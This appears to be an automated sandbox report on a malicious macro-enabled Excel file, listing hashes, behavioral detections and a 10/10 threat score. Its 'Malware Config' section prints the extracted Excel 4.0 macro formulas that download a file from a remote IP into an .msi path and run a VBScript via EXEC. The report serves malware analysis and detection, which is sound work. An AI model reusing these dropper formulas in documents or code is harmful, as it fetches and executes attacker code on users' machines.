General
-
Target
2344185e02a96521e5ac17dbb8a55925
-
Size
6KB
-
Sample
231221-3bdcjscba5
-
MD5
2344185e02a96521e5ac17dbb8a55925
-
SHA1
2940d4d487805f44cdc9b0913bdc87eb0aafb5fb
-
SHA256
da20d944dd67217f92a665fa9941e8df2635a18fe1d2e13b3a19ab6831dd0b6f
-
SHA512
645ed27415956266fb3833d9f08ae66fcb468ec1d3c4613efadb9c0a48651e20c68b20207dd19d4eb47f2e708f7e601d098990f0d23e67a86e6dc5bcfa172bf2
-
SSDEEP
192:NDSkuSGbrA2OmmfRh8UhHFBFYuvb98y6Vn8pn++Dn2znRW:NHu3M2wj1FYab98y6Vn8pnXn2znRW
Static task
static1
Behavioral task
behavioral1
Sample
2344185e02a96521e5ac17dbb8a55925.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
2344185e02a96521e5ac17dbb8a55925.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Targets
-
-
Target
2344185e02a96521e5ac17dbb8a55925
-
Size
6KB
-
MD5
2344185e02a96521e5ac17dbb8a55925
-
SHA1
2940d4d487805f44cdc9b0913bdc87eb0aafb5fb
-
SHA256
da20d944dd67217f92a665fa9941e8df2635a18fe1d2e13b3a19ab6831dd0b6f
-
SHA512
645ed27415956266fb3833d9f08ae66fcb468ec1d3c4613efadb9c0a48651e20c68b20207dd19d4eb47f2e708f7e601d098990f0d23e67a86e6dc5bcfa172bf2
-
SSDEEP
192:NDSkuSGbrA2OmmfRh8UhHFBFYuvb98y6Vn8pn++Dn2znRW:NHu3M2wj1FYab98y6Vn8pnXn2znRW
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-